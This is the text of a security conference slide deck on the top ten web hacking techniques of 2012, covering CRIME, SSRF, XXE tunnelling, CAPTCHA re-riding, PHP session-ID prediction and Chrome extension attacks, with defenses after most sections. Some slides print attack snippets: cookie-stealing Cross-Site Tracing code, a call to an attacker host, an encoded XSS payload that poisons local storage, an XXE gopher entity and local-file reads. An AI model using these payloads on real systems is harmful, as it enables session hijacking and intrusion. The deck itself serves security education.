SlideShare a Scribd company logo
TOP TEN WEB HACKING
TECHNIQUES OF 2012
ABO U T




Jeremiah Grossman
    •    Founder & CTO of WhiteHat Security
    •    TED Alumni
    •    InfoWorld Top 25 CTO
    •    Co-founder of the WASC
    •    Co-author: XSS Attacks
    •    Former Yahoo! information security officer
    •    Brazilian Jiu-Jitsu Black Belt


Matt Johansen
•       Head of WhiteHat's Threat Research Center
•       BlackHat, DEFCON, RSA Speaker
•       Oversees assessment of 15,000+ websites
•       Background in Penetration Testing
•       Hacker turned Management
•       I'm hiring… a lot…


    © 2013 WhiteHat Security, Inc.                    2
ABO U T




WhiteHat Security, Inc.
• Founded 2001
• Head quartered in Santa Clara, CA
• Employees: 260+
• WhiteHat Sentinel: SaaS end-to-end website risk
  management platform (static and dynamic analysis)
• Customers: 500+ (banking, retail, healthcare, etc.)




© 2013 WhiteHat Security, Inc.                          3
ABOUT THE TOP TEN




© 2013 WhiteHat Security, Inc.         4
―Every year the security community produces a stunning
    amount of new Web hacking techniques that are
    published in various white papers, blog posts, magazine
    articles, mailing list emails, conference
    presentations, etc. Within the thousands of pages are
    the latest ways to attack websites, Web
    browsers, Web proxies, and their mobile platform
    equivalents. Beyond individual vulnerabilities with CVE
    numbers or system compromises, here we are solely
    focused on new and creative methods of Web-based
    attack.‖


© 2013 WhiteHat Security, Inc.                                5
H ISTO RY




Past Years
                           2011      • BEAST
               (51 new techniques)

                          2010       • 'Padding Oracle' Crypto Attack
               (69 new techniques)

                          2009       • Creating a rogue CA certificate
               (80 new techniques)

                          2008       • GIFAR (GIF + JAR)
               (70 new techniques)

                          2007       • XSS Vulnerabilities in Common
               (83 new techniques)     Shockwave Flash Files

                          2006       • Web Browser Intranet Hacking / Port
               (65 new techniques)     Scanning


© 2013 WhiteHat Security, Inc.                                               6
T H E YEAR 2 0 1 2




56 NEW Techniques
1. CRIME
2. Pwning via SSRF (memcached, php-fastcgi, etc)
3. Chrome addon hacking
4. Bruteforce of PHPSESSID
5. Blended Threats and JavaScript
6. Cross-Site Port Attacks
7. Permanent backdooring of HTML5 client-side application
8. CAPTCHA Re-Riding Attack
9. XSS: Gaining access to HttpOnly Cookie in 2012
10.Attacking OData: HTTP Verb Tunneling, etc.

  http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of- 2012/

© 2013 WhiteHat Security, Inc.                                           7
2 0 1 2 TO P T EN

                                   Attacking Odata:
                                   HTTP Verb
                                   Tunneling, Navigation
                                   Properties for Additional Data
                                   Access,
                                   System Query Options ($select)
 ―The Open Data Protocol (OData) is an open web protocol
 for querying and updating data. OData enables the creation
 of HTTP-based RESTful data services that can be used to
 publish and edit resources that are identified using uniform
 resource identifiers (URIs) with simple HTTP messages. This
 paper looks at OData from a penetration testing perspective
 and introduces various OData concepts as we progress.‖


Gursev Singh Kalra
http://www.mcafee.com/us/resources/white-papers/foundstone/wp-pentesters-guide-to-hacking-odata.pdf



 © 2013 WhiteHat Security, Inc.                                                                       8
2 0 1 2 TO P T EN




                                       XSS: Gaining access
                                       to HttpOnly Cookie in 2012
‗If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be
accessed through client side script. As a result, even if a cross-site scripting (XSS) flaw exists, and
a user accidentally accesses a link that exploits this flaw, the browser will not reveal the cookie to a
third party. The following describes techniques to gain access to HttpOnly cookie data via client-
side attack.‖




http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html


© 2013 WhiteHat Security, Inc.                                                                         9
BASIC S




HttpOnly cookie flag


 Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
 [; expires=<date>][; domain=<domain_name>]
 [; path=<some_path>][; secure][; HttpOnly]




js> alert(document.cookie);
When a cookie has an HttpOnly cookie flag the
returned value is blank.




https://www.owasp.org/index.php/HttpOnly

© 2013 WhiteHat Security, Inc.                   10
H ISTO RY




CROSS-SITE TRACING (XST) [circa 2003]
 Force cookie values into the body of the HTTP response where there is no
 HttpOnly protection.
  <script>                                      TRACE / HTTP/1.1
   var xmlhttp = new XMLHttpRequest();          Host: foo.bar
   var url = 'http://foo.com/';
                                                HTTP/1.1 200 OK
   // send cookie header                        Date: Mon, 02 Dec 2002 19:24:51 GMT
   xmlhttp.withCredentials = true;              Server: Apache/2.0.40 (Unix)
   xmlhttp.open('TRACE', url, false);           Content-Type: message/http
   xmlhttp.send();                              TRACE / HTTP/1.1
  </script>                                     Host: foo.com
                                                Cookie: httpOnly cookie value



 Performing an XST attack, at the time, required either a cross-domain browser
 vulnerability, or an XSS vulnerability in the target website.


https://www.owasp.org/index.php/Cross_Site_Tracing
http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf

© 2013 WhiteHat Security, Inc.                                                        11
BR O W SER F IX




No TRACE (No TRACK)
Today, no modern browser allows javascript to use these HTTP request methods.




The same is true of Flash, Silverlight, and Java Applets. Well, almost…

© 2013 WhiteHat Security, Inc.                                                  12
XST 2 0 1 2




Java Applet (PoC)
getHeaderField, under the java.net.URLConnection package
Applet requests a URL and reads set-cookie response header
 alert(new
 java.net.URL('http://attacker.in/xss/cookie.php').openConnection().getHeaderFi
 eld('set-cookie'));


“…a vulnerable page in a real-
world application may have
already issued the HttpOnly
cookie by the time the script has
executed.”




Might also be able force out all cookies by overloading them. Cookie Exhaustion.
http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010

© 2013 WhiteHat Security, Inc.                                                                        13
SO L U T ION




                       UNINSTALL JAVA
                                       [on the client, not the server]
                            For this and about 1,000 other [zero-day] reasons.




© 2013 WhiteHat Security, Inc.                                                   14
2 0 1 2 TO P T EN




                                       CAPTCHA
                                       Re-Riding Attack
―CAPTCHA Re-Riding Attack bypasses the CAPTCHA
protection built into the web applications. The attack exploits the
fact that the code that verifies CAPTCHA solutions sent by the
user during form submissions does not clear the CAPTCHA
solution from the HTTP Session.‖

 Completely Automated Public Turing test to tell
 Computers and Humans Apart

Gursev Singh Kalra
http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html


© 2013 WhiteHat Security, Inc.                                          15
BASIC S




CAPTCHA Protected Registration Flow




© 2013 WhiteHat Security, Inc.        16
T EL LTAL E SIG N S




What to look for…
1) captcha.php is responsible for updating the HTTP session with correct CAPCHA
   solution.
2) CAPTCHA solution inside the HTTP session is not explicitly cleared during the
   verification process.
3) After registration succeeds, users are redirected to next step and the CAPTCHA
   generation page (/captcha.php) is not likely called for current SESSION again.
   Allows CAPTCHA solution to stay stored for as long as SESSION is valid.
Two possible vulnerable behavior:
  a. Web application uses the same SESSIONID for the same HTTP session.
  b. Web application generates a new SESSIONID for the same HTTP session.



 In either case, the HTTP Session continues to store the CAPTCHA solution as it
 is not explicitly cleared by the CAPTCHA verification code….


© 2013 WhiteHat Security, Inc.                                                      17
AT TAC K




3a)
1) Load the register page of the target website in a web browser.
2) Solve the CAPTCHA manually and submit the form.
3) Record form submission using a web proxy. This request contains a valid
   SESSIONID, valid form fields, and a valid CAPTCHA solution.
4) Create a custom script that repeatedly sends this request to the server. With each
   request change the unique values (like User ID) to create multiple new accounts
   with a single CAPTCHA solution.




© 2013 WhiteHat Security, Inc.                                                          18
AT TAC K




3b)
1) Load the register page of the target website in a web browser.
2) Solve the CAPTCHA manually, and submit the form.
3) Trap this request in a web proxy and do not allow it to reach the web server. This
   request contains a valid SESSIONID, valid form fields and a valid CAPTCHA
   solution.
4) Create a custom script that repeatedly sends this request to server.
5) Submit one request.
6) Upon successful submission, the web application will reset the current SESSIONID
   and send new SESSIONID back in response headers.
7) Change the value of SESSIONID in recorded request (step 3) to the value copied
   from response in Step 6 above.
8) Go to step 5.
9) Able to make multiple successful submissions with single CAPTCHA solution.


© 2013 WhiteHat Security, Inc.                                                          19
D EF EN SE




―The best defense is to reset CAPTCHA solution inside the HTTP session during the
CAPTCHA verification stage. It is also important to note that when a website relies on
third-party CAPTCHA provider, it does not maintain any session information at its end
and CAPTCHA is performed by the CAPTCHA provider. These websites are not
vulnerable to CAPTCHA Re-Riding Attack.‖




© 2013 WhiteHat Security, Inc.                                                           20
2 0 1 2 TO P T EN




                                        Permanent backdooring
                                        of HTML5 client-side
                                        application
―To improve performance, particularly for mobile users, many
websites have started caching app logic on client devices via HTML5
local storage. Unfortunately, this can make common injection
vulnerabilities even more dangerous, as malicious code can invisibly
persist in the cache. Real-world examples of this problem have now
been discovered in third-party ―widgets‖ embedded across many
websites, creating security risks for the companies using such
services – even if their sites are otherwise protected against
attacks.‖

Joey Tyson
http://securitymusings.com/article/3159/how-a-platform-using-html5-can-affect-the-security-of-your-website

© 2013 WhiteHat Security, Inc.                                                                               21
PR ER EQ U ISIT ES




What to watch out for…
• A Web application caching [javascript] code in HTML5 local storage, rather than
  routinely downloading it across the network every time the app/page is visited.
  Developers find doing this may provide a significant performance boost, particularly
  on mobile devices, where bandwidth and typical caches can be much more limited.



What the bad guy may do next…
• If the code saved in the local storage is compromised, via XSS exploit for
  example, an attacker could inject malicious code that persists in the client-side
  cache. This payload would then be executed by the web app each time a user
  opens the site – even if they‘d previously closed the browser. A single ―reflected‖
  XSS attack can poison the local storage for every following page the user visits on
  that site.




© 2013 WhiteHat Security, Inc.                                                          22
M ASS PW N AG E




Making Matters Worse:
• Eradicating such [malicious] code can be quite difficult, and the victim website might
  not even be able to detect an ongoing attack.
• Reminder: When a developer includes third-party JavaScript on his or her site, that
  code has the same capabilities as any other script on the page.
• Modifying static file on a remote server is generally not possible, even if cross-site
  scripting issues are present, but what if a third-party script from a site with XSS
  problems also stored code in local storage?



 “If content from the compromised origin is commonly embedded on third-party
 pages (think syndicated „like‟ buttons or advertisements), with some
 luck, attacker‟s JavaScript may become practically invincible.”
 - Michal Zalewski


http://events.ccc.de/congress/2011/Fahrplan/events/4811.en.html
http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html


© 2013 WhiteHat Security, Inc.                                                             23
IN - T H E -WILD




Apture (acquired by Google):
• Provided pop-up boxes for exploring content
  related to highlighted terms in a page.
• A 3rd-party ―widget‖ service that used local
  storage code caching – and a page on the
  same domain as those scripts had a reflected
  XSS vulnerability which could be used to
  inject malicious code in the cache. This code
  would then be executed in the context of the
  site using Apture. The problem with Apture‘s
  service affected the security of many sites
  across the web.




© 2013 WhiteHat Security, Inc.                    24
U SAG E




To use Apture widgets:



•   Dynamically loaded an external script hosted on apture.com with a site token specified. This code
    loaded another script based on the user‘s browser which actually began setting up the framework for
    Apture to integrate with the site‘s content.
•   The script inserted an inline frame into the page that loaded a file from cdn.apture.com. A callback
    function allowed this iframe to pass messages back to the original window context where the script is
    running (the non-Apture site). This iframe then loaded the actual app logic and passed the code back
    to the original site via the cross-document messaging interface.
•   Apture‘s iframe setup allowed them to take advantage of another HTML5 innovation that made their
    service load much faster. Web storage functionality provides the localStorage object, a place to save
    key/value data on the client which allows for more space and flexibility than cookies.
•   Apture used a localStorage object for cdn.apture.com not only to save data, such as an ID for
    tracking users, but to actually cache their app logic code. If the cdn.apture.com iframe detected that
    this cache already existed, it would simply load the code from localStorage rather than issue another
    HTTP request for the 272KB worth of JavaScript – saving time and bandwidth.

© 2013 WhiteHat Security, Inc.                                                                          25
EXPL O ITAT ION




EVAL is EVIL

  Like everyone else, Apture had an exploitable XSS vulnerability. This URL
  includes a script that appends ―alert(document.cookie)‖ to the app logic in
  localStorage:
  http://cdn.apture.com/search/xss?yt=%22%3E%3Cscript%3Eif%28window.x%21%3D1%29%7Blo
  calStorage%5B%27app-49971756%27%5D%3DlocalStorage%5B%27app-
  49971756%27%5D%2b%22alert%28document.cookie%29%3B%22%7Dwindow.x%3D1%3C%
  2fscript%3E
  Once this vulnerability is used to insert attack code into localStorage, visiting any site that had
  Apture‘s widgets would cause the attack code to be loaded from the Apture iframe and executed in
  the context of the non-Apture site. Since this is essentially an example of DOM-based XSS (the
  code is loaded dynamically on the client side), requests sent to those sites‘ servers would not
  include any XSS fingerprints, such as <script> in a GET or POST parameter.
  The localStorage code caching turned one reflected XSS vulnerability on Apture’s site into
  persistent, client-side XSS across all domains using their service.




© 2013 WhiteHat Security, Inc.                                                                          26
D EF EN SE




No Simple Answers 
  Trade-offs between performance and risk
  • Application cache, another new HTML5 features, is actually geared towards
    precisely this use case and harder to compromise, but it can create UI
    warnings in some browsers [Firefox]. (Such warnings are a good practice, but
    undesirable for third-party widgets.)
  • Data in local storage should be treated as untrusted, even if it‘s just content
    instead of code.
  • If local storage is used for scripts, it should be accessed from a domain only
    serving static files, which reduces the likelihood of XSS vulnerabilities.
  • Newer browsers also support features such as sandboxed inline frames and
    Content Security Policy that could help limit the impact of embedded widgets if
    they became compromised.




© 2013 WhiteHat Security, Inc.                                                        27
2 0 1 2 TO P T EN




                                        Cross-Site
                                        Port Attacks
―Many web applications provide functionality to pull data from other
webservers for various reasons. Using user specified URLs, web
applications can be made to fetch images, download XML feeds from
remote servers, text based files etc. This functionality can be abused
by making crafted queries using the vulnerable web application as a
proxy to attack other services running on remote/local servers.
Attacks arising via this abuse of functionality are named as Cross-
Site Port Attacks (XSPA).‖
―Riyaz Ahemed Walikar
http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html

Robert Hansen
http://www.sectheory.com/intranet-hacking.htm

© 2013 WhiteHat Security, Inc.                                                 28
3 - T IER



XSPA allows attackers to abuse functionality in web applications to:
1. Port Scan remote Internet facing servers, intranet devices and the local web server itself.
2. Exploiting vulnerable programs running on the Intranet or on the local web server
3. Attacking internal/external web applications that are vulnerable to GET parameter based
   vulnerabilities (SQLi via URL, parameter manipulation etc.)
4. Fingerprinting intranet web applications using standard application default files & behavior
5. Reading local web server files using the file:/// protocol handler.




© 2013 WhiteHat Security, Inc.                                                                    29
T EL LTAL E SIG N




© 2013 WhiteHat Security, Inc.   30
C O D E SAMPL E


<?php
if (isset($_POST['url']))
{
$link = $_POST['url'];
$filename = './curled/'.rand().'txt';
$curlobj = curl_init($link);
$fp = fopen($filename,"w");
curl_setopt($curlobj, CURLOPT_FILE, $fp);
curl_setopt($curlobj, CURLOPT_HEADER, 0);
curl_exec($curlobj);
curl_close($curlobj);
fclose($fp);
$fp = fopen($filename,"r");
$result = fread($fp, filesize($filename));
fclose($fp);
echo $result;
?>




     © 2013 WhiteHat Security, Inc.          31
R EAL - W ORL D AT TAC K




 Port Scanning using Google Webmaster Tools




 © 2013 WhiteHat Security, Inc.               32
AT TAC K




Port Scanning using Google Webmaster Tools




© 2013 WhiteHat Security, Inc.               33
AT TAC K




Port Scanning using Google Webmaster Tools




© 2013 WhiteHat Security, Inc.               34
AT TAC K




Reading local files using file:/// protocol
Request: file:///C:/Windows/win.ini




© 2013 WhiteHat Security, Inc.                35
AT TAC K



Adobe's Omniture web application file:///etc/passwd




© 2013 WhiteHat Security, Inc.                        36
D EF EN SE



• Response Handling: If a web application expects specific content type on the
  server, programmatically ensure the data received satisfies checks imposed on the
  server before displaying or processing the data for the client.
• Error handling and messages: Display generic error messages when something
  goes wrong. If content type validation fails, display generic errors to the client like
  "Invalid Data retrieved". Also ensure message are the same when the request fails
  on the backend and if invalid data is received. This prevents the application from
  being abused as distinct error messages will be absent for closed and open ports.
• Restrict connectivity to HTTP based ports: Restrict the ports to which the web
  application can connect to, such as HTTP ports: 80, 443, 8080, 8090 etc. Doing so
  can lower the attack surface.
• Blacklist IP addresses: Internal IP addresses, localhost specifications and internal
  hostnames can all be blacklisted to prevent the web application from being abused
  to fetch data/attack these devices.
• Disable unwanted protocols: Only allow http and https to make requests to
  remote servers. Whitelisting these protocols will prevent the web application from
  making requests over other protocols like file:///, gopher://, ftp:// and other URI
  schemes.

© 2013 WhiteHat Security, Inc.                                                              37
2 0 1 2 TO P T EN




                                       Blended Threats
                                       and JavaScript
―During 2006, it was shown how common Web browser attacks could be
leveraged bypass perimeter firewalls. In the years since, the fundamental
problems were never addressed and the Intranet remains wide open, probably
because the attack techniques described had important limitations. These
limitations prevented mass scale and persistent compromise of network
connected devices, which include but are not limited to home broadband
routers. Now in 2012, with the help of new research and next-generation
technologies like HTML5, browser-based Intranet attacks have overcome many
of the old limitations and improved to a new degree of scary.‖

Phil Purviance and Josh Brashars
https://superevr.com/blog/2012/blended-threats-and-javascript/

© 2013 WhiteHat Security, Inc.                                               38
BASIC S




Web Threats -> Network Compromise
• Utilize an XSS bug to poke holes in Intranet network
• Take advantage of very outdated security in routers
• Flash the firmware of that router via XSS, File Upload Abuse, &
  CSRF
• Permanent compromise




© 2013 WhiteHat Security, Inc.                                 39
T H E AT TAC K




Scan The Intranet




                                                     Yay HTML5!



JavaScript Intranet scan, nothing new or fancy but
does return a list of internal Ips that are up and
listening.



© 2013 WhiteHat Security, Inc.                                    40
T H E AT TAC K




Gain Access




                                 The easy way

© 2013 WhiteHat Security, Inc.                  41
Real World Examples




© 2013 WhiteHat Security, Inc.   42
T H E AT TAC K




Gain Access




 The less easy way



© 2013 WhiteHat Security, Inc.   43
Basic Auth Brute Force




© 2013 WhiteHat Security, Inc.   44
EXPL O IT




HTML5 File Upload




                             Load Malicious Firmware to memory
                                                       https://github.com/superevr/ddwrt-install-tool

© 2013 WhiteHat Security, Inc.                                                               45
D EF EN SE




Router
• Change default passwords!



Browser
• NoScript, Request Policy, Other XSS & CSRF protections




© 2013 WhiteHat Security, Inc.                             46
2 0 1 2 TO P T EN




                                      Bruteforce
                                      of PHPSESSID
―...We provide a number of practical techniques and algorithms for
exploiting randomness vulnerabilities in PHP applications. We focus on
the predictability of password reset tokens and demonstrate how an
attacker can take over user accounts in a web application via predicting
or algorithmically derandomizing the PHP core randomness generators.‖

Arseny Reutov, Timur Yunusov, and Dmitry Nagibin
http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html

George Argyros and Aggelos Kiayias
http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf
http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks.html

© 2013 WhiteHat Security, Inc.                                             47
BASIC S




PHPSESSID =
md5( client IP . timestamp . microseconds1 . php_combined_lcg() )
•    client IP is known to the attacker;
•    timestamp is known through Date HTTP-header;
•    microseconds1 – a value from 0 to 1000000;
•    php_combined_lcg() – an example value is 0.12345678.


To generate php_combined_lcg(), two seeds are used:
S1 = timestamp XOR (microseconds2 << 11)
S2 = pid XOR (microseconds3 << 11)
•    timestamp is the same;
•    microseconds2 is greater than microseconds1 (when the first time measurement was made) by 0–3;
•    pid is the id of the current process (0–32768, 1024–32768 on Unix);
•    microseconds3 is greater than microseconds2 by 1–4.



“The greatest entropy is contained in microseconds1, however with the use of two
techniques it can be substantially reduced.”

© 2013 WhiteHat Security, Inc.                                                                   48
T EC H N IQ UE 1




Adversarial Time Synchronization
ATS: Send a pair of HTTP requests to determine the moment when the second in the
Date HTTP header changes.

1) Connect to a web server and send request pairs: 1st to a non-
   existent page so it‘ll take a minimum time for the web-server
   to return the response. The 2nd to our target web-application.   HTTP/1.1 200 OK
2) Get an average time interval between sending an HTTP             Date: Wed, 08 Aug 2012 06:05:14 GMT
   request and receiving the response (= RTT)                       …
                                                                    HTTP/1.1 200 OK
3) When the seconds in Date HTTP-header of the two requests         Date: Wed, 08 Aug 2012 06:05:15 GMT
   changed approximate the time of remote microseconds in
   local time using RTTs of the two requests divided by two and
   offsetting the delay between requests.
4) If session_start() is called somewhere deeper in the code, you
   may try to install the web-app locally and get the approximate
   time when it is called.


“...the microseconds between our requests zeroed. By sending requests with dynamic
delays it is possible to synchronize local value of microseconds with the server one.”

© 2013 WhiteHat Security, Inc.                                                                   49
T EC H N IQ UE 2


  Request Twins
  Attacker send two requests: the 1st — to reset their own password and the 2nd —
  to reset that of an administrator. The gap between microseconds will be minimal.


To increase speed over the
PasswordPro module by
taking advantage of positive
linear correlation between
deltas of
microseconds, they created
their own application.




  16 million hashes per second, seed calculation takes less than an hour on 3.2 GHz
  Quad Core i5. Having pid and php_combined_lcg one can compute the seed used in
  mt_rand. (timestamp x pid) XOR (106 x php_combined_lcg())

  “if a web application uses standard PHP sessions, it is possible to obtain the random
  numbers generated via mt_rand(), rand(), and uniqid().”

  © 2013 WhiteHat Security, Inc.                                                          50
T EC H N IQ UE 3


Get mt_rand seed through random
numbers leakage
“The seed used for mt_rand is an unsigned integer 2^32. If a random number
leaked, it is possible to get the seed using PHP itself and rainbow tables. It takes
less than 10 minutes.”




The scripts to generate rainbow tables, search the seed, and ready-made tables
http://www.gat3way.eu/poc/mtrt/

© 2013 WhiteHat Security, Inc.                                                    51
SO L U T IONS




What to look for and code defense
“All the mt_rand(), rand(), uniqid(), shuffle(), lcg_value(), etc. The only secure
function is openssl_random_pseudo_bytes(), but it is rarely used in web
applications.”



•    MySQL function RAND() — it can be also predicted though.
•    Suhosin patch — does not patch mt_srand, srand. The Suhosin extension should
     also be installed.
•    /dev/urandom — the securest way.




© 2013 WhiteHat Security, Inc.                                                       52
2 0 1 2 TO P T EN




                                      Chrome addon hacking
―Webpages can sometimes interact with Chrome addons and that
might be dangerous. Chrome addons fingerprinting, universal
XSS, bypass AdBlock, Chrome Extension Exploitation
Framework, and owning a system.‖



―Krzysztof Kotowicz
http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
http://blog.kotowicz.net/2012/02/chrome-addons-hacking-want-xss-on.html
http://blog.kotowicz.net/2012/03/chrome-addons-hacking-bye-bye-adblock.html
http://blog.kotowicz.net/2012/07/xss-chef-chrome-extension-exploitation.html
http://blog.kotowicz.net/2012/09/owning-system-through-chrome-extension.html

© 2013 WhiteHat Security, Inc.                                                 53
H ISTO RY




Hacking Google ChromeOS
“Googleʼsdrive to move away from the desktop, and into the cloud results in desktop
applications being replaced with HTML5 & JavaScript rich extensions. These new
“desktop programs” seem to be more secure, because they do not have the classic
vulnerabilities that desktop applications end services have--buffer/stack/heap
overflows/underflows, format string attacks, plus many more. Since exploitation no
longer leads to shell, the real dangers and implications of any exploit seem to be
mitigated.
Unfortunately, this is not true. HTML and Javascript applications (Chrome Extensions)
are now vulnerable to standard HTML and Javascript attacks. The most serious, in this
situation, is Cross Site Scripting. By utilizing an XSS vulnerability in an extension, an
attacker can pivot from that extension, and take advantage of the permissions given to
it to attack and gain access to user information loaded in other tabs.”
-Matt Johansen & Kyle Osborn
BlackHat 2011 WhitePaper




© 2013 WhiteHat Security, Inc.                                                         54
BASIC S




Why Chrome Extensions?
•    Basic HTML applications
•    Access to extensive APIs
•    Permissions set by 3rd party Dev
•    Manifest.json
•    Sandbox side-step


Exploitation
• Universal XSS via 1 extension bug
• chrome.tabs, chrome.history, chrome.cookies, chrome.proxy, API access make for
  powerful attacks
• Filesystem access and remote code execution made easy




© 2013 WhiteHat Security, Inc.                                                     55
APPL IC AT IO N




BeEF & ChEF
• You‘ve found XSS in an extension, utilized it to exploit Javascript in any tab.
  Now what? Browser Exploitation Framework & Chrome Extension Exploitation
  Framework
•   BeEF – Metasploit of the web. Makes reflective XSS more persistent and able to replay exploits
•   ChEF – BeEF for Chrome Extensions.

    •    Monitor current sessions / open tabs
    •    Execute JavaScript on any site in any tab
    •    Access localStorage
    •    Read / write cookies
    •    Manipulate browser history
    •    Take screenshots
    •    Inject BeEF hooks to utilize their payloads and exploits




© 2013 WhiteHat Security, Inc.                                                                       56
C H EF




ChEF Console




© 2013 WhiteHat Security, Inc.   57
EXPL O ITAT ION




XSS Everywhere
• If an extension‘s ‗manifest.json‘ file has permissions set to ‗*‘
  you can execute JavaScript anywhere in the browser with
  ‗chrome.tab.executeScript‘
• Bypass AdBlock:




    By altering the DOM you can create a global whitelist


© 2013 WhiteHat Security, Inc.                                        58
D EF EN SE




                                 Beware




© 2013 WhiteHat Security, Inc.            59
2 0 1 2 TO P T EN




                                    Pwning via SSRF
                                    (memcached, php-fastcgi, etc)
―SSRF, as in Server-Side Request Forgery. A great concept of the attack
which was discussed in 2008 with very little information about theory and
practical examples. The idea is to find victim server interfaces that will allow
sending packets initiated by victim's server to the localhost interface of the
victim server or to another server secured by firewall from outside. We have
found various SSRF vulnerabilities which allow internal network port
scanning, sending any HTTP requests from server, bruteforcing backed and
more but the most powerful technique was XXE Tunneling.‖
Alexander Polyakov
http://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_WP.pdf
http://erpscan.com/press-center/blog/ssrf-via-ws-adressing/
http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf

© 2013 WhiteHat Security, Inc.                                                                 60
H ISTO RY




SSRF (CIRCA 2008)
“The first example of SSRF is an SMBRelay attack discussed by Deral Heiland at
Shmoocon in 2008 entitled, “Web Portals Gateway To Information Or A Hole In Our
Perimeter Defenses.” Some web-interfaces on corporate portals allow loading any
external resource like an iframe. The difference was that Web interface allows loading
files from other HTTP sources. It was done by portlets that were designed to deliver to
the user the requested information that the user cannot access directly. The portlet
runs a transaction to a connected system and then runs its response with information
to the portal user. These portlets makes portal a single point of access to internal
resources. This was a great example of SSRF attack via URL parameter of vulnerable
portlet.”


…


“Later, other examples of SSRF attacks were shown. Same ideas, but attack was
executed through XML External Entity vulnerability. “



© 2013 WhiteHat Security, Inc.                                                        61
BASIC S




Attack Flow
•    Send Packet A to Service A
•    Service A initiates Packet B to Service B
•    Services can be on the same host or on
     different hosts
•    We can manipulate some fields of
     Packet B within Packet A
•    Various SSRF attacks depend on how
     many fields we can control in Packet B


Exploitation
• Vulnerabilities like File Include, SQL Injection, XML External Entity or any other
  vulnerability that allows executing commands that initiate calls to remote systems.
• Through enhanced rights in an application, when you can call HTTP pages or UNC
  paths or use trusted connections.

© 2013 WhiteHat Security, Inc.                                                          62
C L ASSIF IC AT ION




Many classes of SSRF attacks (complicated)
• Trusted SSRF: Send requests (Packet B) to remote services, but only to those
  which are somehow predefined.
• Remote SSRF: Requests (Packet B) to any remote IP and port. This type has
  3 subtypes depending on how much data we can control:
   • Simple Remote SSRF: No control on application level of Packet B
   • Partial Remote SSRF: Control on some fields of application level of Packet B
   • Full Remote SSRF: Full control on application level of Packet B




© 2013 WhiteHat Security, Inc.                                                      63
EXAMPL ES




Trusted SSRF attacks

MSSQL: Need at least public rights to use MSSQL trusted links. Links can be with
predefined passwords. The attacker can use them in Host A to forge requests and obtain
responses from Host B.
Select * from openquery(HostB,'select * from @@version')]


Oracle: Links can be with predefined passwords. The attacker can use them to forge
requests and obtain responses from host B.
SELECT * FROM myTable@HostB
EXECUTE mySchema.myPackage.myProcedure('someParameter')@HostB




© 2013 WhiteHat Security, Inc.                                                       64
EXAMPL ES




Simple Remote SSRF
SAP NetWeaver ipcpricing: Scan an internal network from the Internet by sending
different HTTP requests to JSP pages.
/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetCli
ent=




© 2013 WhiteHat Security, Inc.                                                    65
XXE T U N N EL IN G




Partial Remote SSRF
XXE Tunneling (via Gopher): XML External Entity (XXE) is a very popular vulnerability
in XML Parser. External entities force the XML parser to access the resource specified by
the URI, e.g., a file on the local machine or on a remote systems.
• Makes a TCP connection with 172.16.0.1 and port 3300 and then send a packet
  containing string 23456789 (the first symbol will be cut).


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM ―gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>




© 2013 WhiteHat Security, Inc.                                                       66
D IAG R AM




© 2013 WhiteHat Security, Inc.   67
AD VAN C ED




XXE Tunneling to Buffer Overflow
• A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote
  1487330)
• Shellcode size is limited to 255 bytes (name parameter)
• As we don‘t have direct connection to the Internet from the vulnerable system, we
  want to use DNS tunneling shellcode to connect back




© 2013 WhiteHat Security, Inc.                                                        68
PAC KET B




© 2013 WhiteHat Security, Inc.   69
PAC KET A




Insert Packet B into Packet A
• We need to insert non-printable symbols. Gopher supports urlencode like HTTP
• Also help evade attack against IDS systems




© 2013 WhiteHat Security, Inc.                                                   70
FULL CONTROL




© 2013 WhiteHat Security, Inc.   71
C O U N T ER -AT TAC K




SSRF back connect attack
We send a command from Server A to our Server C using SSRF, and then we generate a
response which will trigger a vulnerability in an application from Server A.
SMB client
• DoS by reading huge files remotely
• SMBRelay
• RCE Vulnerabilities in SMB client
Memory corruption vulnerabilities in FTP client
Client path traversal
JAR parser
mailto: parser
HTTP client
• DoS by multiple entities with links to big data
• DoS by multiple GZIP bomb

© 2013 WhiteHat Security, Inc.                                                72
2 0 1 2 TO P T EN




                                        CRIME
―Compression Ratio Info-leak Made Easy (CRIME) is a
security exploit against secret web cookies over connections
using the HTTPS and SPDY protocols that also use data
compression. When used to recover the content of secret
authentication cookies, it allows an attacker to perform session
hijacking.‖


Juliano Rizzo and Thai Duong
http://netifera.com/research/crime/CRIME_ekoparty2012.pdf
http://en.wikipedia.org/wiki/CRIME_(security_exploit)
http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

© 2013 WhiteHat Security, Inc.                                          73
BASIC S




CRIME
Decrypts HTTPS traffic to steal cookies and hijack sessions. Requirements to
become a victim:

1) Attacker can sniff your network traffic.
2) Victim visits evil.com
3) Both the browser and server support any
   version of TLS compression or SPDY


     Previously                           *
     Vulnerable




       Never
     Vulnerable


Gmail, Twitter, Dropbox, GitHub, etc.
“42% of sites surveyed by his service support TLS compression.” Ivan Ristic
https://www.ssllabs.com/index.html

© 2013 WhiteHat Security, Inc.                                                 74
SID E - C H AN NEL




CRIME: Chosen Plaintext Attack
•    Compression reduces the number of bytes contained in a data stream
     by removing redundant bits. A side effect of compression is it leaks
     clues about the encrypted contents, providing a "side channel" to those
     with the ability to monitor the data.
•    By modifying the clear-text payload hundreds or thousands of times
